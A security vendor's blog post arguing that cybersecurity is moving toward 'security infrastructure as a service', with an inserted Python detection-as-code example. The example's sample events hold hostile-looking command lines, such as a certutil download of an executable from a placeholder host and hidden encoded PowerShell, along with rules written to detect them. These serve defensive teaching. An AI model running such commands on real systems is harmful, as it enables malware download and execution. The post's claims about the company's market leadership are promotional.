Evolution of cybersecurity and Security Infrastructure as a Service
Musings about the past, present & the future of cybersecurity, why the current approach won’t scale, and what we can do next
Evolution of cybersecurity
As I mentioned in the previous article, there were 1,862 data breaches in 2021, surpassing both 2020’s total of 1,108 and the previous all-time record of 1,506 set in 2017.
Security entrepreneurs are taking note, and new startups emerge daily. Here is a "simple" example of what has become a common way to group companies in a logical way, a so-called cybersecurity technology map:
This is a lot to take in, yet the above chart is one of the simplest illustrations available when searching “cybersecurity technology map”.
A reasonable question could be — how did we get here?
It’s a difficult question to answer as there are many variables that have led us here. The simplest answer might sound like this: “Every market goes through different stages of evolution. What we are seeing today in security is a natural evolutionary path, marked by milestones that appear inevitable, in hindsight”.
Vendor Specialization
Security is a complex space with many attack vectors, and few people who truly understand the fundamentals. This complexity has led companies to specialize and build monolithic products which address a single, narrow use case in depth.
Specialization, from a basic perspective, does make logical sense: the more you do thing A, the better you become at doing thing A. For companies, specialization makes it easier to achieve economies of scale, and to carve out a lucrative niche. For customers, it is easier to evaluate vendors who operate within narrowly defined verticals.
Things start to break down as an industry gets more complex. Two verticals become four, four become eight, and after a few years you are sitting in front of a chart with thousands of logos within hundreds of boxes. This is arguably how we got AV, EDR, XDR, NDR, SIEM, SOAR and many other market categories.
At some point, specialization becomes a liability. Without having a broad and holistic understanding of industry fundamentals, vendors start building products that do one thing fairly well, but can’t easily integrate into a larger picture. Customers struggle to evaluate different vendors as there are simply too many product groups involved. Confused and overwhelmed, they start defaulting to heuristics and so-called “expert recommendations” which fuels the industry of market analysts and consultants.
Vendor Integration
Inevitably, users reach a point of overwhelm, where making sense of the myriad market options becomes a tiresome chore. Adding to this frustration is the need to buy hundreds of tools and hope to stitch them all together, because each specialized product solves only a limited subset of problems. This is arduous for many reasons:
more vendors means more spending
more spending & more contract negotiation results in more overhead for finance, supply chain and security teams
more tools creates the need to connect them into one experience
This last one is especially tricky as each widget has a highly specialized use case, and on its own it was never designed to talk to other widgets.
At this stage, two things happen:
a new market category appears, providing a class of products that connect thousands of widgets which were never intended to connect with each other; what was born out of desperation becomes the SOAR vertical
large companies realize that there is a need for all-in-one solutions, so they do what is easy and what they are best equipped to do: buy small vendors and integrate them into their legacy platforms
Short-term, this might appear to be a positive shift, a “win” for the whole industry. It cannot, however, be a sustainable long-term approach. An average Fortune 500 company today manages 100+ cybersecurity vendors and this number is growing.
If this is the stage we are at today, where do we go from here? What next step makes the most sense?
Security Infrastructure as a Service
At LimaCharlie, we argue that cybersecurity today is undergoing an evolution similar to the one IT recently experienced: the evolution that led to monolithic enterprise technology being replaced by the infrastructure-as-a-service approach, like that offered by Amazon Web Services (AWS).
When AWS came into the picture, most companies came to realize that an assembly of tools from large vendors is unnecessary. Rather, an ecosystem of solutions encompassing the ability to self-serve, scale up/scale down, and achieve efficiency by leveraging API-first products built for scale, is much more logical.
Today, LimaCharlie is leading the market transformation and the definition of security infrastructure as a service. LimaCharlie enables organizations to detect & respond to threats, automate processes, reduce the number of vendors, and future-proof their security operations.
The approach LimaCharlie takes is innovative and sound, from both a technical and a business perspective.
From the technical perspective, LimaCharlie focuses on solving security problems regardless of what industry vertical has traditionally been expected to solve them. Most importantly, it is done in a way that scales. Below are some examples of how Security Infrastructure as a Service compares to the traditional, vertical market segments. By no means an exhaustive list of features LimaCharlie offers, rather a flavour of what security infrastructure looks like:
As security engineers, we know that security is a process, not a feature. The best way to build a security posture is to build it on top of controls and infrastructure that can be observed, tested and enhanced. It is not built on promises from vendors that must be taken at face value.
This means that the exact set of malicious activity and behavior you are protected from should be known, and you should be able to test and prove it. It also means that if you can describe something you want to detect and prevent, you should be able to apply it unilaterally, without vendor intervention.
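What "observable, testable and enhanced" looks like in practice is detection-as-code: rules expressed as data, evaluated over telemetry by code you can read, and checked against known-bad samples so that the answer to "what am I covered against?" is a test result rather than a vendor's promise. The following is an added illustration, not LimaCharlie's own rule format or code; the rule schema, the event shape and the sample events are constructed for this example only.

```python
"""Detection-as-code: rules as data, evaluated over telemetry, with a coverage report.

Added example, not LimaCharlie code. The rule schema and event shape are
assumptions for illustration, not any vendor's format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample telemetry: process-creation and DNS events, shaped like
# what an endpoint sensor might report. Entirely made up for this example.
SAMPLE_EVENTS = [
    {"event": "NEW_PROCESS", "host": "ws-01",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami",
     "parent": r"C:\Windows\explorer.exe"},
    {"event": "NEW_PROCESS", "host": "ws-02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA",
     "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE"},
    {"event": "NEW_PROCESS", "host": "ws-03",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"event": "DNS_REQUEST", "host": "ws-01", "domain": "update.example.invalid"},
]


@dataclass
class Rule:
    """A detection rule as data: event type plus per-field regexes (all must match)."""
    name: str
    event: str
    match: dict[str, str]            # field name -> case-insensitive regex
    tags: list[str] = field(default_factory=list)   # e.g. ATT&CK technique IDs

    def evaluate(self, ev: dict) -> bool:
        if ev.get("event") != self.event:
            return False
        return all(re.search(pat, str(ev.get(f, "")), re.IGNORECASE)
                   for f, pat in self.match.items())


# The rule set is the explicit, reviewable statement of what you are covered against.
RULES = [
    Rule(name="office-spawns-powershell", event="NEW_PROCESS",
         match={"parent": r"\\(WINWORD|EXCEL|POWERPNT)\.EXE$",
                "image": r"\\powershell\.exe$"},
         tags=["T1566", "T1059.001"]),
    Rule(name="encoded-powershell", event="NEW_PROCESS",
         match={"image": r"\\powershell\.exe$",
                "cmdline": r"(^|\s)-(e|ec|enc|encodedcommand)\s"},
         tags=["T1059.001", "T1027"]),
    Rule(name="certutil-download", event="NEW_PROCESS",
         match={"image": r"\\certutil\.exe$", "cmdline": r"-urlcache"},
         tags=["T1105"]),
]


def run_rules(events: list[dict], rules: list[Rule] = RULES) -> dict[str, list[dict]]:
    """Return {rule_name: [matching events]} so coverage is observed, not assumed."""
    hits: dict[str, list[dict]] = {r.name: [] for r in rules}
    for ev in events:
        for r in rules:
            if r.evaluate(ev):
                hits[r.name].append(ev)
    return hits


def coverage_report(events: list[dict], rules: list[Rule] = RULES) -> dict:
    """Which rules fired, which stayed silent on this corpus, and how many
    events no rule claimed. Run this over a known-bad sample set in CI: a
    rule that goes silent after a change is a regression, not a quiet day."""
    hits = run_rules(events, rules)
    unmatched = [ev for ev in events if not any(r.evaluate(ev) for r in rules)]
    return {
        "fired": sorted(n for n, h in hits.items() if h),
        "silent": sorted(n for n, h in hits.items() if not h),
        "unmatched_events": len(unmatched),
    }


if __name__ == "__main__":
    for name, matched in run_rules(SAMPLE_EVENTS).items():
        for ev in matched:
            print(f"[{name}] host={ev['host']} cmdline={ev.get('cmdline')}")
    print(coverage_report(SAMPLE_EVENTS))
```

The point is not the three rules, which are deliberately simple, but that the rules, the evaluator and the sample corpus live together in version control: a change to any of them is reviewed, and the coverage report is asserted in a test rather than read off a dashboard.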
The only way to get there is to approach security the same way you approach building other IT systems. Thankfully, security has a proven track record to look up to: IT and DevOps.
Not all parts of the security stack are equal. Some layers are fundamentally similar across environments, or are sophisticated but can be abstracted to serve all use cases. These are the layers of the stack that LimaCharlie lives in: the layers where a security engineer's time is spent inefficiently. You need those layers, but any work you have to do to provision and maintain them is wasted time, money and effort. We do all this for you, so you can focus on the higher-level layers, where you shine.
From the business perspective, we attempt to democratize access to security and make it easier, more transparent, and more cost-effective. Some highlights include:
What this means for the future is that organizations can gain access to infinitely scalable capabilities they need when, and for however long they need them, with no capacity planning or contracts to sign.
Why LimaCharlie exists
LimaCharlie was built by security professionals as an answer to four fundamental, yet unmet needs.
Need for Transparency
Historically, the security industry has not been transparent to consumers or security professionals.
"How do I know what I am covered against?" is the most basic question a security professional has when choosing a vendor. And yet most EDR, AV, SIEM and other vendors offer "magic box" solutions that lack transparency and promise to "keep you safe against everything". However disingenuous and misleading this assurance might be to those who know that security is complex, it is a common variation of the marketing statement that most security companies circulate.
The lack of transparency does not end there. “How much will I be paying?” is another question that should be simple to answer and yet it is not. With most vendors, going through a series of meetings and sales demos before learning what pricing to expect, and in some instances before you can take a look at the product, is not unusual.
LimaCharlie stands on the principle of full transparency and we believe this is what the security market of the future needs to look like.
Need for Control
Getting familiar with each craft starts by following prescriptive directions. “Do X and you will get Y”. This simplicity benefits beginners as it allows them to internalize simple axioms before they learn the fundamentals that define rules of the game. Security is no different. “When a red light is flashing on the dashboard, gather your team as you are under attack” is a simple direction both to give and to follow.
That is until you stop being a beginner. As your expertise broadens, you learn that to ensure a holistic security posture, you need to understand your company’s operation and have a deep familiarity with your environment. Once you reach this level, a red flashing alert is no longer enough — you want to be able to control how you do security.
“How can I control my own destiny and decide how we do security at my organization?”
“How do I choose what services to use and what capabilities to pay for?”
These and many other questions cannot be answered by the vertically focused vendors as their products lack flexibility and the ability to choose what you use and how you use it. There is a need for another approach — one that allows full control over the neutral infrastructure, does not dictate how you do things, or force you in any direction.
Need for Scale
It is not enough to simply customize a product to fit a security team’s workflow. Monitoring a single company is one thing, monitoring N companies at scale is entirely different. It’s like changing the tire on your car, vs opening a garage where you see 200 cars a week: it’s easy to find a solution when the demand is minimal, but making that solution work when managing hundreds of tenants requires broader capabilities and quite a bit more finesse.
The question a security professional eventually starts asking is “How can I scale our way of doing security across thousands of endpoints and possibly hundreds of tenants?”
This question cannot be answered by vendors that built monoliths and connected them together. Yes, there are large companies on the market which acquire startups by the dozen and attempt to position themselves as an "all-in-one solution". However, taking fifty widgets that were not integrated from day one, banding them together, and expecting the result to behave like a scalable infrastructure platform such as Google Cloud or AWS is impractical.
To address the need for scale, it is imperative to build for scale from day one: to think about latency and integration when you plan every single feature. That is what we do at LimaCharlie. We take the API-first approach and promote infrastructure as code, which enables us to offer the same experience when serving thousands of tenants as we do when serving one.
Need for Innovation
We know that security needs innovation. As cybercriminals are getting more and more advanced, it is imperative that those on the defence side keep innovating as well. We believe that there are three components needed for innovation to happen: people, funding and infrastructure.
People
In the past decade, we have seen a huge shift around cybersecurity education. Universities, colleges, bootcamps, and online education providers are stepping up to fill the talent gap in security. Students, professionals and industry leaders are organizing meetups, CTFs and hands-on competitions to grow their skills and to prepare the next generation of security talent.
Funding
A larger shift has been happening around funding as well. There are a number of venture capital firms, startup incubators and angel investors solely focused on security. Governments have been offering grants and non-dilutive funding as well. Most importantly, both private and institutional investors have started including cybersecurity companies in their portfolios.
Infrastructure
The last critical ingredient required for innovation is cost-effective access to infrastructure. The emergence of cloud computing has enabled small teams to access the computing power that was previously only available to large enterprises. This, in turn, has led to the rise of machine learning, artificial intelligence and other emerging technologies.
Cybersecurity as an industry has been very slow to catch up with the shift that happened in IT.
“How can I get started in seconds without having to meet any minimums or talk to a team of salespeople just to access the product?”
Today, this is a question that is very hard to answer. EDR and SIEM vendors require a minimum number of endpoints and a multi-year contract before you can get started. For a startup founder or a small innovative DFIR/MSSP firm, this requirement can hinder growth and even kill the idea.
LimaCharlie is democratizing access to security infrastructure by allowing users to get started with powerful tools and infrastructure for free, without having to do the capacity planning or put in their credit card. We believe that making security infrastructure more accessible will lead to innovation in the industry and, ultimately, benefit all of us.
What’s next?
Discussions of any new technology, as well as predictions about the future of the whole industry, tend to age very badly, as this article about Google Glass from 9 years ago shows.
As Peter Drucker said,
The only thing we know about the future is that it will be different.
While we can’t confidently say what the future will look like, we can see that:
Security is becoming more and more complex, and “point and click” antivirus/EDR solutions can no longer offer the same peace of mind as they did 5–10 years ago
The number of attack vectors is growing every year, and every new medium (VR, AR, metaverse, social media, etc.) is introducing more and more complexity
The amount of data is growing and as the world becomes more connected, the number of breaches is going up as well
The number of security vendors focused on small use cases is growing, and integrating tens (or hundreds) of tools into one solution is still a big challenge
Very few products on the market are built as API-first, developer-centered solutions
This list can go on for quite some time. It is unreasonable to argue that any new approach is going to solve all problems. Our thesis at LimaCharlie is that security infrastructure as a service will equip security professionals with powerful tools so that they can focus on what they do best. The future of security, at least for the next decade, is human.